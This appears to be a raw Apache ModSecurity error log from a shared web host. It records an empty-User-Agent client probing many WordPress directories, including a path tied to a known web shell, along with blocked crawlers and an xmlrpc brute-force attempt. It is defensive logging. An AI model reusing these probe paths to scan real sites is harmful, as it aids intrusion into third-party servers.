[Tue May 26 17:05:58.826411 2026] [security2:error] [pid 851641:tid 851880] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/Text/"] [unique_id "ahWFnhp8QSN2510avp43hQAAAG0"]
[Tue May 26 17:05:59.081155 2026] [security2:error] [pid 851641:tid 851890] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFnhp8QSN2510avp43lAAAAHc"]
[Tue May 26 17:05:59.081194 2026] [security2:error] [pid 851641:tid 851890] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFnhp8QSN2510avp43lAAAAHc"]
[Tue May 26 17:05:59.081385 2026] [security2:error] [pid 851641:tid 851781] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/mu-plugins-old/"] [unique_id "ahWFnhp8QSN2510avp43kgAAAAo"]
[Tue May 26 17:05:59.281721 2026] [security2:error] [pid 851641:tid 851878] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFnhp8QSN2510avp43igAAAGs"]
[Tue May 26 17:05:59.568256 2026] [security2:error] [pid 851641:tid 851792] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFnxp8QSN2510avp43pwAAABU"]
[Tue May 26 17:05:59.568293 2026] [security2:error] [pid 851641:tid 851792] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFnxp8QSN2510avp43pwAAABU"]
[Tue May 26 17:05:59.568768 2026] [security2:error] [pid 851641:tid 851875] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/themes/classic/inc/"] [unique_id "ahWFnxp8QSN2510avp43pAAAAGg"]
[Tue May 26 17:05:59.945416 2026] [security2:error] [pid 851641:tid 851868] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFnxp8QSN2510avp43uQAAAGE"]
[Tue May 26 17:05:59.945444 2026] [security2:error] [pid 851641:tid 851868] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFnxp8QSN2510avp43uQAAAGE"]
[Tue May 26 17:05:59.945964 2026] [security2:error] [pid 851641:tid 851839] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/ninja-forms/"] [unique_id "ahWFnxp8QSN2510avp43tgAAAEQ"]
[Tue May 26 17:06:00.350655 2026] [security2:error] [pid 851641:tid 851844] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFoBp8QSN2510avp43xQAAAEk"]
[Tue May 26 17:06:00.350686 2026] [security2:error] [pid 851641:tid 851844] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFoBp8QSN2510avp43xQAAAEk"]
[Tue May 26 17:06:00.351158 2026] [security2:error] [pid 851641:tid 851862] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/mu-plugins/"] [unique_id "ahWFoBp8QSN2510avp43wwAAAFs"]
[Tue May 26 17:06:00.623157 2026] [autoindex:error] [pid 851641:tid 851864] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:00.623835 2026] [security2:error] [pid 851641:tid 851864] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFoBp8QSN2510avp43zgAAAF0"]
[Tue May 26 17:06:00.624342 2026] [security2:error] [pid 851641:tid 851801] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/Text/Diff/Renderer/"] [unique_id "ahWFoBp8QSN2510avp43zAAAAB4"]
[Tue May 26 17:06:00.809451 2026] [security2:error] [pid 851641:tid 851871] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-includes/blocks/index.php"] [unique_id "ahWFoBp8QSN2510avp432wAAAGQ"]
[Tue May 26 17:06:00.809927 2026] [security2:error] [pid 851641:tid 851773] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-includes/blocks/"] [unique_id "ahWFoBp8QSN2510avp432QAAAAI"]
[Tue May 26 17:06:00.933316 2026] [security2:error] [pid 851641:tid 851835] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFoBp8QSN2510avp43ywAAAEA"]
[Tue May 26 17:06:01.048168 2026] [autoindex:error] [pid 851641:tid 851806] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:01.048850 2026] [security2:error] [pid 851641:tid 851806] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFoRp8QSN2510avp433gAAACM"]
[Tue May 26 17:06:01.049325 2026] [security2:error] [pid 851641:tid 851855] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/certificates/"] [unique_id "ahWFoRp8QSN2510avp433AAAAFQ"]
[Tue May 26 17:06:01.288523 2026] [autoindex:error] [pid 851641:tid 851826] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/customize/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:01.289217 2026] [security2:error] [pid 851641:tid 851826] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFoRp8QSN2510avp435gAAADc"]
[Tue May 26 17:06:01.289659 2026] [security2:error] [pid 851641:tid 851812] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/customize/"] [unique_id "ahWFoRp8QSN2510avp435AAAACk"]
[Tue May 26 17:06:01.333584 2026] [security2:error] [pid 851641:tid 851827] [client 85.208.96.208:27692] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/halloween/list/"] [unique_id "ahWFoRp8QSN2510avp436gAAADg"]
[Tue May 26 17:06:01.333727 2026] [security2:error] [pid 851641:tid 851827] [client 85.208.96.208:27692] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/halloween/list/"] [unique_id "ahWFoRp8QSN2510avp436gAAADg"]
[Tue May 26 17:06:01.522752 2026] [autoindex:error] [pid 851641:tid 851836] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:01.523422 2026] [security2:error] [pid 851641:tid 851836] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFoRp8QSN2510avp437gAAAEE"]
[Tue May 26 17:06:01.523840 2026] [security2:error] [pid 851641:tid 851819] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/fonts/"] [unique_id "ahWFoRp8QSN2510avp436wAAADA"]
[Tue May 26 17:06:01.740125 2026] [autoindex:error] [pid 851641:tid 851777] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/images/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:01.740797 2026] [security2:error] [pid 851641:tid 851777] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFoRp8QSN2510avp439gAAAAY"]
[Tue May 26 17:06:01.741215 2026] [security2:error] [pid 851641:tid 851818] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/images/"] [unique_id "ahWFoRp8QSN2510avp439AAAAC8"]
[Tue May 26 17:06:01.998314 2026] [autoindex:error] [pid 851641:tid 851883] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:01.999016 2026] [security2:error] [pid 851641:tid 851883] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFoRp8QSN2510avp44AwAAAHA"]
[Tue May 26 17:06:01.999553 2026] [security2:error] [pid 851641:tid 851881] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/.well-known/"] [unique_id "ahWFoRp8QSN2510avp44AAAAAG4"]
[Tue May 26 17:06:02.280466 2026] [security2:error] [pid 851641:tid 851852] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFohp8QSN2510avp44CQAAAFE"]
[Tue May 26 17:06:02.280496 2026] [security2:error] [pid 851641:tid 851852] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFohp8QSN2510avp44CQAAAFE"]
[Tue May 26 17:06:02.280847 2026] [security2:error] [pid 851641:tid 851805] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/ALFA_DATA/"] [unique_id "ahWFohp8QSN2510avp44BwAAACI"]
[Tue May 26 17:06:02.556654 2026] [security2:error] [pid 851641:tid 851800] [client 203.194.101.7:51151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFohp8QSN2510avp44EAAAAB0"]
[Tue May 26 17:06:02.557110 2026] [security2:error] [pid 851641:tid 851800] [client 203.194.101.7:51151] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFohp8QSN2510avp44EAAAAB0"]
[Tue May 26 17:06:02.569381 2026] [security2:error] [pid 851641:tid 851863] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFohp8QSN2510avp44DwAAAFw"]
[Tue May 26 17:06:02.569401 2026] [security2:error] [pid 851641:tid 851863] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFohp8QSN2510avp44DwAAAFw"]
[Tue May 26 17:06:02.570019 2026] [security2:error] [pid 851641:tid 851864] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/.well-knownold/"] [unique_id "ahWFohp8QSN2510avp44DQAAAF0"]
[Tue May 26 17:06:02.586565 2026] [security2:error] [pid 851641:tid 851787] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFohp8QSN2510avp44BgAAABA"]
[Tue May 26 17:06:02.806351 2026] [autoindex:error] [pid 851641:tid 851849] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:06:02.807403 2026] [security2:error] [pid 851641:tid 851849] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFohp8QSN2510avp44FAAAAE4"]
[Tue May 26 17:06:02.821378 2026] [security2:error] [pid 851641:tid 851871] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/.well-known/acme-challenge/"] [unique_id "ahWFohp8QSN2510avp44EQAAAGQ"]
[Tue May 26 17:06:03.076925 2026] [security2:error] [pid 851641:tid 851833] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFoxp8QSN2510avp44GQAAAD4"]
[Tue May 26 17:06:03.076962 2026] [security2:error] [pid 851641:tid 851833] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFoxp8QSN2510avp44GQAAAD4"]
[Tue May 26 17:06:03.077417 2026] [security2:error] [pid 851641:tid 851799] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/cgi-bin/"] [unique_id "ahWFoxp8QSN2510avp44FwAAABw"]
[Tue May 26 17:06:03.451100 2026] [security2:error] [pid 851641:tid 851821] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFoxp8QSN2510avp44IwAAADI"]
[Tue May 26 17:06:03.451127 2026] [security2:error] [pid 851641:tid 851821] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFoxp8QSN2510avp44IwAAADI"]
[Tue May 26 17:06:03.451753 2026] [security2:error] [pid 851641:tid 851870] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index/"] [unique_id "ahWFoxp8QSN2510avp44IQAAAGM"]
[Tue May 26 17:06:03.742212 2026] [security2:error] [pid 851641:tid 851848] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFoxp8QSN2510avp44KQAAAE0"]
[Tue May 26 17:06:03.742236 2026] [security2:error] [pid 851641:tid 851848] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFoxp8QSN2510avp44KQAAAE0"]
[Tue May 26 17:06:03.756132 2026] [security2:error] [pid 851641:tid 851812] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/id/"] [unique_id "ahWFoxp8QSN2510avp44JwAAACk"]
[Tue May 26 17:06:04.049689 2026] [security2:error] [pid 851641:tid 851782] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFoxp8QSN2510avp44NQAAAAs"]
[Tue May 26 17:06:04.049715 2026] [security2:error] [pid 851641:tid 851782] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFoxp8QSN2510avp44NQAAAAs"]
[Tue May 26 17:06:04.080970 2026] [security2:error] [pid 851641:tid 851793] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/www/"] [unique_id "ahWFoxp8QSN2510avp44MwAAABY"]
[Tue May 26 17:06:04.336647 2026] [security2:error] [pid 851641:tid 851868] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFpBp8QSN2510avp44RAAAAGE"]
[Tue May 26 17:06:04.336674 2026] [security2:error] [pid 851641:tid 851868] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFpBp8QSN2510avp44RAAAAGE"]
[Tue May 26 17:06:04.337297 2026] [security2:error] [pid 851641:tid 851895] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/web/"] [unique_id "ahWFpBp8QSN2510avp44QgAAAHw"]
[Tue May 26 17:06:04.623032 2026] [security2:error] [pid 851641:tid 851778] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFpBp8QSN2510avp44SgAAAAc"]
[Tue May 26 17:06:04.623054 2026] [security2:error] [pid 851641:tid 851778] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFpBp8QSN2510avp44SgAAAAc"]
[Tue May 26 17:06:04.623567 2026] [security2:error] [pid 851641:tid 851844] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/uploads/"] [unique_id "ahWFpBp8QSN2510avp44SAAAAEk"]
[Tue May 26 17:06:04.922280 2026] [security2:error] [pid 851641:tid 851854] [client 89.117.104.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFpBp8QSN2510avp44VgAAAFM"]
[Tue May 26 17:06:04.922318 2026] [security2:error] [pid 851641:tid 851854] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFpBp8QSN2510avp44VgAAAFM"]
